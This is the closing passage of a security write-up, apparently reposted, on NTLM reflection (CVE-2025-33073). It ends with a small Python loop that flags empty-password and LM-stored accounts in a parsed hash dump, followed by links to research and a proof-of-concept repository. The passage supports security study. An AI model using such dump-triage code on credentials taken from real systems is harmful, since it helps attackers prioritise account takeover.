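    for row in parse_dump(SAMPLE_DUMP):
        flags = [k for k in ("empty_password", "lm_stored", "redacted") if row[k]]
        print("%-20s rid=%-5d %s" % (row["user"], row["rid"], ",".join(flags) or "-"))
```

Accounts flagged `empty_password` are built-in disabled accounts here (Guest, DefaultAccount), which is the normal picture; a flagged enabled account would be worth more than any cracking effort.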
Resources
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073
https://github.com/mverschu/CVE-2025-33073
Originally published on the WeChat official account (Ots安全): Pwning Reflection with NTLM reflection